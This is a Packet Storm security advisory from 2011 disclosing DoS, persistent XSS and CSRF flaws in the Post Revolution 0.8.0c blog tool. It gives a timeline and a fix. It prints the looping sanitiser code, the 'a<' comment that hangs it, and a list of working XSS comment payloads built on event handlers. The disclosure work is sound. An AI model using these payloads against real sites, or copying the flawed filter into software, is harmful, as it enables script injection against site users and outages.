exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Post Revolution 0.8.0c XSS / XSRF / Denial Of Service

Post Revolution 0.8.0c XSS / XSRF / Denial Of Service
Posted Jun 1, 2011
Authored by Javier Bassi

Post Revolution version 0.8.0c suffers from cross site request forgery, cross site scripting, and denial of service vulnerabilities.

tags | exploit, denial of service, vulnerability, xss, info disclosure, csrf
advisories | CVE-2011-1952, CVE-2011-1953, CVE-2011-1954
SHA-256 | c326ab8cc2255d5e582a5a5c103cc9b9e6e64ac1effb215d3c8e08c05d0b1799

Post Revolution 0.8.0c XSS / XSRF / Denial Of Service

Change Mirror Download
info
———————————
Name : Post Revolution 0.8.0c Multiple Remote Vulnerabilities
Class: Design Error && Input Validation Error
CVE: CVE-2011-1952, CVE-2011-1953, CVE-2011-1954
Remote: Yes
Local: No
Credit : Javier Bassi <javierbassi [at] gmail [dot] com>
Vulnerable : All versions prior to and including 0.8.0c are affected.
Vendor Hompeage : http://postrev.com.ar



description
———————————
Post Revolution is an open source blog tool and publishing platform
powered by PHP and MySQL.



discussion
———————————
Post Revolution is prone to multiple remote vulnerabilities, including:
1. A Denial of service vulnerability. (CWE-835) (CVE-2011-1952)
2. Persistent Cross-site scripting vulnerabilities. (CWE-79) (CVE-2011-1953)
3. Cross-site request forgery vulnerabilities. (CWE-352) (CVE-2011-1954)

An attacker may leverage these issues to cause a denial-of-service
condition, perform certain administrative actions, execute arbitrary
script code in the browser of an unsuspecting user in the context of
the website, steal cookie-based authentication credentials, and gain
unauthorized access to the affected application.
Post Revolution 0.8.0c is vulnerable.



timeline
———————————
2011.05.22 – Informed developers
2011.05.23 – Patch for issues 1 & 2 released.
2011.06.01 – Disclosed



details/pocs
———————————
1. Denial of Service vulnerability
Post Revolution allows some HTML tags in the comments and removes all
non-permitted.
The vulnerable code is in the lines 456 to 462 in common.php:

while(stripos($s,'<') > 0){
$pos[1] = stripos($s,'<');
$pos[2] = stripos($s,'>', $pos[1]);
$len[1] = $pos[2] - $pos[1] + 1;
$x = substr($s,$pos[1],$len[1]);
$s = str_replace($x,'',$s);
}

This code tries to remove every non-permitted HTML tag. $s is the
content of the comment. An attacker could post a comment with just
'a<' and then while(stripos($s,'<') > 0) will always be true because
pos[1]=1, pos[2] will be NULL, len[1]=0, then x = NULL so $s will be
again 'a<'.
This will cause an infinite loop that will end when php kills the
script printing:
Fatal error: Maximum execution time of 30 seconds exceeded in
/var/www/postrev/common.php on line 459


2. Cross-site scripting vulnerabilities.
Post Revolution allows the following tags in the comments:
p,strong,a,em,i,img,li,ol,video,blockquote
and don't sanitize their attributes.
So the following XSS vectors work:
<a href="javascript:alert(1)">some text</a>
<p onmouseover="javascript:alert(1)">some text</p>
<a href="" onmouseover="javascript:alert(1);">some text</a>
<em onmouseover="javascript:alert(1)">some text</em>
<strong onmouseover="javascript:alert(1)">some text</strong>
<i onmouseover="javascript:alert(1)">some text</i>
<img src="https://encrypted.google.com/images/logos/ssl_logo_lg.gif"
onmouseover="javascript:alert(1)" />
<ol><li onmouseover="javascript:alert(1)">some text</li></ol>
<ol onmouseover="javascript:alert(1)"><li>1</li><li>2</li></ol>
<blockquote onmouseover="javascript:alert(1)">some text</blockquote>

The same with other events like onclick, onmouseout, onmousemove, onkeydown, etc
Also note that the PR doesn't close the tag for you, so its not
necesary to get the comment mouseovered by the admin. If the attacker
post <p onmouseover="javascript:alert(1)">some text
mouseover event will be triggered when the admin moves the mouse
anywhere below attacker's comment.


3. Cross-site request forgery vulnerabitiles.
There is CSRF everywhere in ajax-weblog-guardar.php, verpost.php,
comments.php, perfil.php, etc. PR 0.8.0c has absolutely no protection
against CSRF in any form except for anonymous comments and
registration that has a captcha.



solution
———————————
You can fix DoS and XSS vulns fast by replacing the whole function
check_html in common.php from line 416 to 471 with
function check_html($s){
return htmlspecialchars($s);
}

Users will not be able to format their comments with HTML but Post
Revolution already has BBcode so there was no need of HTML in comments
in the first place.
NO HTML FOR YOU!

Fix the CSRFs will require some coding.
Vendor has released a patch for issues 1 and 2:
postrev.com.ar



References
——————-
1. Advisory URL: http://javierb.com.ar/2011/06/01/postrev-vunls/
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close